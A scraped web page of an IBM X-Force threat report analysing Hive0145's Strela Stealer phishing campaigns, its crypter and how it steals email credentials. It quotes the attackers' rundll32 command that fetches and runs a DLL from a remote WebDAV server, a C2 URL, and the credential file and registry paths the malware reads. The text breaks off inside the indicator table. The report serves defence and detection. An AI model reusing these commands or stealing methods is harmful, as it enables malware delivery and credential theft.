tabindex="7" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Click to open the search bar"></amp-img> </button> </div> <!-- TABLET MENU - TAP/CLICK 
id="scrollToTopButton" on="tap:top-viewer.scrollTo(duration=200, position=bottom)" class="tap_target "> <div class="scroll-to-top__button"> <amp-img width="12" height="16" layout="fixed" alt="Back-to-top" src="https://securityintelligence.com/wp-content/themes/sapphire/images/scroll-to-top.svg"></amp-img> </div> </button> </div> <!-- SCROLL SHOW/HIDE ANIMATION --> <amp-animation id="showAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "1", "visibility": "visible" }] }] } </script> </amp-animation> <amp-animation id="hideAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "0", "visibility": "hidden" }] }] } </script> </amp-animation> </div> <!-- CHECK PAGE POSITION --> <amp-position-observer target="top-viewer" intersection-ratios="0" on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer> <!-- SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "http://schema.org", "@type": "Article", "headline": "Strela Stealer: Today’s invoice is tomorrow’s phish", "mainEntityOfPage": "https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/", "author": { "@type": "Person", "name": "Golo Mühr" }, "datePublished": "2024-11-12T06:00:00-05:00", "dateModified": "2024-11-14T18:28:12-05:00", "publisher": { "@type": "Organization", "name": "Security Intelligence", "logo":{ "@type": "ImageObject", "url": "https://securityintelligence.com/wp-content/themes/security-intelligence/assets/img/logo.png" } }, "image": [ "https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg" ], "articleBody": "As of 
November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering <i>Strela Stealer</i> malware to victims throughout Europe - primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation's effectiveness. Hive0145 is likely a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of Strela Stealer. The continuous operational pace of Hive0145's campaigns highlights an increased risk to potential victims across Europe. <h2>Key Findings:</h2> <ul type="disc"> <li>Hive0145 is an initial access broker focused on targeting victims throughout Europe</li> <li>During the last 18 months, Hive0145 has tested out a variety of techniques to improve the Strela Stealer infection chain and extract email credentials</li> <li>As of July 2024, Hive0145 began using stolen emails to further spread Strela Stealer</li> <li>Hive0145 campaigns have increased in volume, with weekly campaigns as of 17 October 2024</li> <li>As of early November 2024, Hive0145 began targeting Ukraine with stolen invoice emails</li> <li>Hive0145 is potentially the sole operator of Strela Stealer</li> </ul> <h2>Background</h2> Starting mid-April 2023, X-Force began tracking an increase in Hive0145 activity. Hive0145 is likely a financially motivated initial access broker (IAB) and potentially the sole operator of Strela Stealer. Strela Stealer is a <a href="https://www.ibm.com/topics/malware" target="_blank" rel="noopener">malware</a> designed to extract user email credentials stored in Microsoft Outlook and Mozilla Thunderbird, potentially leading to Business Email Compromise (BEC). 
IABs routinely gather credentials and other data that are sold to affiliate <a href="https://www.ibm.com/topics/threat-actor" target="_blank" rel="noopener">threat actors</a> specializing in victim network exploitation. However, it remains unknown if Hive0145 has a specific partner network for selling the access gained through their campaigns. Over the past year, Hive0145 has demonstrated proficiency in evolving tactics, techniques and procedures (TTPs) to target victims across Europe. Italian, Spanish, German and Ukrainian victims continue to receive weaponized attachments that entice them to open the file. The actor's campaigns present the victim with fake invoices or receipts and often a short, generic message of urgency for victims to address. Upon loading the attached file, the victim unwittingly executes the infection chain leading to Strela Stealer malware. <strong><img src="https://images2.cmp.optimizely.com/Zz1iODZmNTg3OGEwN2ExMWVmYWNmNDY2OGUwNDMwMWU2OQ==" alt="fig 1-strela_santander.png" width="547.8264947245018" height="544" /></strong> <em>Figure 1 Banco Santander-themed email campaign</em> Hive0145 continued this pattern of using generic messages and fake invoices and receipts throughout the first half of 2024. However, by early July 2024, the group adopted a different approach and began weaponizing stolen emails of actual entities across financial, technology, manufacturing, media, e-commerce and other industries. This departure from simplicity indicates that Hive0145's cyber operations capability is maturing. <h2>Attachment hijacking</h2> In July 2024, X-Force observed a mid-campaign change in the emails being distributed by Hive0145, with the short and generic messages being replaced with what appeared to be legitimate stolen emails. 
The <a href="https://www.ibm.com/topics/phishing" target="_blank" rel="noopener">phishing</a> emails exactly matched official invoice communication emails and, in some cases, still directly addressed the original recipients by name. X-Force was able to verify that the emails were in fact authentic invoice notifications from a variety of entities across financial, technology, manufacturing, media, e-commerce and other industries. It is likely that the group sourced the emails through previously exfiltrated credentials from their prior campaigns. The concept of using stolen emails is not new; it was used extensively by the Emotet group and malware distributors such as Hive0118 (aka TA577), <a href="https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity">TA551</a> and <a href="https://www.proofpoint.com/sites/default/files/misc/pfpt-us-threat-research-2023-05-12-cybercrime-experimentation.pdf">TA570</a>. In their campaigns, they leveraged thread hijacking, where new replies to stolen emails were used as a way to increase the appearance of legitimacy. The modified emails were sent to corresponding contacts of previous victims, making the final email look like a reply to the stolen email, thereby hijacking the email thread. The text the distributors add to the emails usually consists of short replies urging victims to look at the included attachments or URLs. The technique employed by Hive0145 differs from thread hijacking in that, rather than adding a reply message to the stolen email, the original contents remain largely unmodified and only the attachment is switched to include a malicious payload using the original filename (without the original extension). Within the email body, Hive0145 also replaces both the local part and the domain of the original email sender with those of the new phishing victim to custom-tailor the email. The emails with hijacked attachments are then sent out in mass phishing campaigns. 
Hive0145 also appears to carefully select the hijacked emails, choosing only ones referring to invoices and containing attachments. X-Force has observed the attachment hijacking technique since mid-2024 in campaigns targeting German, Spanish and Ukrainian speakers. <strong><img src="https://images1.cmp.optimizely.com/Zz1jYTBkYzQwMmEwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" alt="fig 2-image-2024-11-5_16-42-6.png" width="544" height="615.3951497860199" /></strong> <em>Figure 2 Example of original stolen email of a Deutsche Bahn invoice with hijacked attachment</em> <h2>Late 2024 campaign</h2> The July 2024 campaign began with low volumes of email delivery throughout the week of 8 July. Hive0145 appeared to take a short break before returning with a larger campaign the week of 22 July, followed by a period of inactivity. Starting mid-October 2024, Hive0145 returned with a widespread attachment hijacking campaign targeting Spanish, German and Ukrainian victims. Unlike the brief July campaign, this one has continued sending out notable volumes of emails, with the majority sent during weekdays. <img src="https://images1.cmp.optimizely.com/Zz1kNWYyZTYxY2EwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" alt="fig 3-image copy.png" width="672" height="112" /> <em>Figure 3 The ongoing late-October 2024 campaign</em> Emails stolen across financial, technology, manufacturing, media, e-commerce and other industries continue to be weaponized as of early November 2024, in one of the largest observed Hive0145 campaigns to date. In the ongoing campaign, the victim receives an archive containing a heavily obfuscated JavaScript file that downloads and executes a crypted Strela Stealer DLL. As of 7 November 2024, Hive0145 is including Ukrainian speakers in the ongoing campaign, signaling a significant development compared to previously observed victimology. 
<strong><img src="https://images3.cmp.optimizely.com/Zz1mYWMzNGEyY2EwN2ExMWVmYTdmYTllMDI5N2MwOTY3Mg==" alt="fig 4-Screenshot 2024-11-11 at 08.59.58.png" width="544" height="616.068376068376" /></strong> <em>Figure 4 Example of the original stolen email of an invoice targeting Ukraine</em> Hive0145's increased volume of delivery using attachment hijacking with a steady supply of freshly stolen emails may suggest the group has adopted automation for harvesting, weaponizing, packaging and sending their phishing emails. The group continues to show a preference for widespread exploitation of Spanish, German and Ukrainian victims throughout Europe. <h2>Evolving techniques</h2> Hive0145 stands out among other malware distributors for its level of effort to adopt increasingly sophisticated methods of delivering Strela Stealer. The level of sophistication mirrors that of other successful mass distributors of malware such as Emotet, Pikabot and Qakbot, which often led to the deployment of <a href="https://www.ibm.com/topics/ransomware" target="_blank" rel="noopener">ransomware</a>. Below is a breakdown of notable techniques used by Hive0145 over time, with some being briefly tested and others fully adopted. <h3>Polyglots</h3> The first Strela Stealer campaigns observed by X-Force made use of polyglot files, as first reported in a <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc">blog by DCSO (Deutsche Cyber-Sicherheitsorganisation)</a> in late 2022. These files have multiple valid formats and can be parsed by different applications. The same file could be rendered as HTML to display a decoy invoice while also being a valid DLL implementing Strela Stealer. This is a rather uncommon technique for attempting to bypass security solutions. <h3>Signed binaries</h3> Multiple campaigns throughout 2023 made use of valid code signing certificates for the malicious Strela Stealer binaries. 
For example, campaigns targeting Spanish-speaking victims dating back to April 2023 contained payloads with a valid certificate signed by <b>Tecfinance Informatica E Projetos De Sistemas Ltda</b>, a software company in Brazil. <strong><img src="https://images4.cmp.optimizely.com/Zz0wZTc0Y2ViYWEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" alt="fig 5-image.png" width="573" height="455" /></strong> <em>Figure 5 Brazilian company certificate used in 2023 campaigns</em> On 5 May 2024, X-Force took steps to inform relevant parties of the finding, and the certificate has since been revoked. Of note, a mid-2023 Italy-targeted campaign used a different certificate: <strong><img src="https://images1.cmp.optimizely.com/Zz0xYjA0NGNiZWEwN2IxMWVmOGEzYzJhYzI5NDg3NjE0MA==" alt="fig 6-Screenshot 2023-05-15 at 12.58.52.png" width="341" height="372" /></strong> <em>Figure 6 Another stolen certificate used in mid-2023 to target Italian victims</em> <h2>Targeted phishing</h2> Strela Stealer phishing campaigns also tailored filenames to include targeted domain names. The file names are often identical to the name of the organization or company, potentially in an attempt to generate authenticity. The example below is a phishing email from 2023 posing as an invoice or payment receipt. <img src="https://images3.cmp.optimizely.com/Zz0yOWJhYjYzMGEwN2IxMWVmYTVjZWU2NTBmNjQyY2Y2Ng==" alt="fig 7-strela_factura.png" width="547.8354876615747" height="544" /> <em>Figure 7 Factura-themed email campaign</em> As the email suggests, the attachments are encrypted ZIP files, with passwords slightly differing between every email. Threat actors encrypt email attachments since basic email filtering and sandbox solutions often cannot inspect or detonate those files. 
Strela Stealer has also used uncommon extensions for their PE executable files such as <b>.com</b> instead of <b>.exe</b>: <table class="ScrollCode" style="border: 1pt dashed #6199c9; width: 88.5174%;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 100%; border: none; padding: 8.65pt 5pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">transferencia_<domain_name>.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">factura_<domain_name>.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">FATTURA_<domain_name>.bat.exe</span></span></p> </div></td> </tr> </tbody> </table> This makes use of a condition in Microsoft Windows operating systems where three different extensions can be used to mark a file as executable: <b>.exe, .com, </b>and<b> .pif.</b> If the content is an executable PE file, Microsoft Windows will run it automatically once opened. By using the more uncommon and unknown extensions, the campaign may evade simple anti-virus solutions or victim suspicion. Earlier campaigns with the same payloads were also observed to make use of the <b>.pif</b> extension. 
<h2>Packing, obfuscation and crypting</h2> Apart from directly attached ZIP archives with the malicious executables, Strela Stealer campaigns also often use obfuscated scripts such as Batch, JavaScript or PowerShell to download or drop their payload. Campaigns throughout 2024 mainly relied on these obfuscated scripts to run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #003366;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">"C:\Windows\system32\rundll32.exe"</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> \\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">94.159</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">113.48</span></span><span style="color: gray;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">@8888</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">\davwwwroot\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">157161090119030</span></span><span style="color: black;"><span 
style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.dll,Entry</span></span></p> </div></td> </tr> </tbody> </table> The WebDAV staging servers host a large number of DLLs, with different names and hashes. They appear to have been built using a crypter X-Force identifies as "Stellar Crypter," which has likely been in use exclusively by Hive0145 since at least May 2023. The malicious binaries identified as "Stellar Loader" contain the encrypted Strela Stealer payload. <h2>Stellar Loader</h2> Stellar Loader is a crypter that has been in use since at least April 2023 and is predominantly a precursor to follow-on Strela Stealer payloads. Stellar samples are usually highly obfuscated and make use of techniques such as control-flow obfuscation and large amounts of junk instructions to hinder analysis and signature creation. Stellar's payload is XOR encrypted and stored in the .data section of the Stellar loader binary. The encrypted payload data is preceded by the XOR key, which, in recent samples, consists solely of upper and lowercase letters and can be thousands of characters long. Upon execution, Stellar Loader decrypts the payload data using XOR and the stored key. The decryption process may also involve an additional round of XOR using a hardcoded single-byte key. As part of the Stellar Loader code's obfuscation, the decryption algorithm within the code is often expanded to include hundreds of operations. However, the vast majority of these operations cancel each other out, and what appears to be a complex algorithm can be reduced to a simple XOR operation. The screenshot below shows a version of Stellar Loader with minimal obfuscation, where the structure of the loader code and decryption algorithm can be easily seen. 
<img src="https://images4.cmp.optimizely.com/Zz0zZDg2NjY1MGEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" alt="fig 8-241105-stellar-loader-code.PNG" width="675" height="632" /> In more recent versions of the loader, the encrypted payload data is followed by an additional encrypted block containing a list of API names required by the loader code, such as VirtualAlloc. The loader decrypts this block using the same key as the payload but without the additional single-byte XOR. The loader can then use the API names in the block to retrieve the corresponding API addresses. <img src="https://images1.cmp.optimizely.com/Zz02YTFlOTUwY2EwN2IxMWVmYmRiNDI2ZmFmZTE3ZDc1MA==" alt="fig 9-241105-stellar-decrypted-apis.PNG" width="593" height="128" /> Once the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and maps the payload PE at the allocated address. It then performs the standard PE loading steps, such as loading its imports and processing any relocation sections (.relocs), and finally, it executes the payload at its entry point address. <h2>Strela Stealer</h2> Strela Stealer changed little in functionality over the past two years. Starting with the initial version reported on by <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc">DCSO</a> in late 2022, the main objective of the stealer is to exfiltrate email credentials from two common email clients: Microsoft Outlook and Thunderbird. This is consistent across all variants, however, the latest variant does support more registry keys to search for Microsoft Outlook credentials than prior versions. 
Strela Stealer runs two functions tasked with stealing credentials from two email clients: <table class="ScrollTableNormal" style="width: 1067px; border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 55.4453px; border: 1pt solid #dddddd; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Email client</span></b></p> </td> <td style="width: 301.875px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Thunderbird</span></b></p> </td> <td style="width: 693.43px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Microsoft Outlook</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Location</span></p> </td> <td style="width: 301.875px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: 
Calibri, sans-serif;">File system</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Registry</p> </td> </tr> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Path</span></p> </td> <td style="width: 301.875px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>logins.json</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>key4.db</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows 
Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676</p> </td> </tr> </tbody> </table> For Outlook, Strela Stealer specifically looks for the registry values: <ul type="disc"> <li>IMAP Server</li> <li>IMAP User</li> <li>IMAP Password - decrypted using <i>CryptUnprotectData()</i></li> </ul> The data is formatted and prepended with the string "FF" or "OL" for Thunderbird data and Outlook data, respectively. Next, it is also encrypted with a static XOR key, which represents a GUID string such as: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">96be98b2-8a00-410d-87da-2482cc8b7793</span></span></p> </div></td> </tr> </tbody> </table> Then, Strela Stealer sends a POST request for each email client to its hardcoded C2 server: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: 
Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">http:</span></span><span style="color: #008200;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">//94.159.113[.]48/server.php</span></span></p> </div></td> </tr> </tbody> </table> The response is decrypted via the same XOR key above. Strela Stealer continues to send out POST requests in 1-second intervals until a request fails or it receives back the string "KH" (2023 versions), "ANTIROK" (2024 versions) or “CHOLLIMA” (Nov. 2024 versions). As of October 2024, Strela Stealer also includes two more exfiltration functions. The first gathers system information on the host and writes it to a file via the command: <img src="https://images2.cmp.optimizely.com/Zz0wZmQyMDI4MGEwODcxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" alt="Strela Stealer screen1.png" width="683" height="58" /> The second exfiltration function uses COM objects to enumerate the list of installed applications from the "AppsFolder" (a virtual folder, displayed as "Applications") on the victim machine. <strong><img src="https://images3.cmp.optimizely.com/Zz03NjhhNWNkNmEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" alt="fig 10-image-2024-10-31_14-21-3.png" width="673" height="511" /></strong> The dropped file, as well as the list of installed applications, are read and encrypted before exfiltration in the same fashion as the others. They are sent to the C2 server with identifiers "SI" and "LA" respectively. <h2>Language checks</h2> Strela Stealer started to implement language checks by verifying the keyboard language on the victim host. 
Versions throughout 2024 only run on hosts with one of the following keyboard languages: <ul type="disc"> <li>Spanish</li> <li>German</li> <li>Catalan</li> <li>Polish</li> <li>Italian</li> <li>Basque</li> </ul> <strong><img src="https://images2.cmp.optimizely.com/Zz1iMzU5YzM1ZWEwN2IxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" alt="fig 11-image-2024-10-31_12-58-20.png" width="513" height="303" /></strong> In early November, Hive0145 started distributing stolen Ukrainian emails as well and modified the language verification logic slightly, adding Ukrainian (0x422) to the list of keyboard layouts. In addition, the developers switched to using the <i>GetKeyboardLayoutList</i> API to cover all installed keyboard layouts. If none of the languages match, Strela Stealer has a secondary check comparing the result of the user’s default locale from <i>GetLocaleInfoA </i>against “AU” and “UA”, which are the codes for Australia and Ukraine. It is possible that the developer was not sure of the endianness of the returned value and did not intend to target Australia. Overall, these changes increase the scope of machines available for a Strela Stealer infection. <strong><img src="https://images3.cmp.optimizely.com/Zz1iZWQ1MTFmMmEwN2IxMWVmOTI4NWU2NTBmNjQyY2Y2Ng==" alt="fig 12-image (9).png" width="667" height="91" /></strong> Previously, the malware would display an unobtrusive error message to the user after running in order to not raise any suspicion. It states that the file was corrupted and could not be opened, in the language corresponding to the installed keyboard layout. The latest versions use the more universal error message "Err 100", which is shown 5 seconds after execution begins. <h2>.NET variant</h2> In June 2023, X-Force observed a single Italy-targeted Hive0145 campaign delivering a new Strela Stealer variant that was completely rewritten in <strong>.NET</strong>. Similar to the campaigns before it, this one also made use of valid code signing certificates. 
Re-implementing malware in a different language shows a significant effort by the threat actor. In order to conceal strings, function names and control flow, the developers made use of the commercial "Aldaray Rummage Obfuscator" for <strong>.NET</strong>. The screenshot below shows the code used to access and unprotect IMAP credentials from Microsoft Outlook registry keys. <strong><img src="https://images3.cmp.optimizely.com/Zz1lMjkyOWY2MGEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" alt="fig 13-image-2024-11-1_10-43-23.png" width="561" height="455" /></strong> Notably, the commercial obfuscator does include a watermark for the license, which was observed as: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Rummage is licensed to Victoria Semigodova (issue J) </span></span><span style="color: #336699; font-weight: bold;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">for</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> use with any product. 
5687c5da50660eda</span></span></p> </div></td> </tr> </tbody> </table> The sample above displays the following error message in Italian: <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Il file viene arrestato e non può essere eseguito.</span></span></p> </div></td> </tr> </tbody> </table> <h2>Hive0145 objectives</h2> Hive0145's focus on harvesting email credentials sets them apart from other operators of stealer or botnet malware, which are often commoditized and target a broader range of credentials and data, or facilitate follow-on payloads intended for initial access. Hive0145's use of stolen emails for attachment hijacking is an indicator that a portion of stolen email credentials may be used to harvest legitimate emails for further distribution. Both stolen and actor-created emails used by Hive0145 predominantly feature invoices as themes, which points towards potential financial motivation. It is possible that Hive0145 may sell stolen emails to affiliate partners for the purposes of further business email compromise. <h2>Conclusion:</h2> Hive0145 is a rapidly maturing cyber criminal threat actor and seeks to infect victims with the intention of gaining valid email credentials. Observations suggest that the theft of email credentials, through initial campaigns, led to further theft of valid emails used in subsequent attachment hijacking campaigns. 
Strela Stealer malware continues to be an effective tool for Hive0145 to extract email credentials. The wide variety of industries emulated by Hive0145's email campaigns increases the potential risk of being targeted for commercial organizations throughout Europe. Of note, organizations in Italian, Spanish, German, or Ukrainian-speaking regions may be at more immediate risk of a Hive0145 campaign. X-Force recommends heightened vigilance surrounding email attachments received and careful review of the expected file type delivered. <h2>Recommendations:</h2> X-Force recommends organizations: <ul type="disc"> <li>Exercise caution with emails and ZIP archive attachments</li> <li>Consider changing the default application for JavaScript/JScript/VBScript files to Notepad</li> <li>Monitor rundll32.exe processes executing remotely hosted DLLs, such as DLLs loaded from WebDAV UNC paths as in the command shown above</li> <li>Install and configure endpoint security software</li> <li>Update relevant network security monitoring rules</li> <li>Educate staff on the potential threats to the organization</li> </ul> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 201.55pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; 
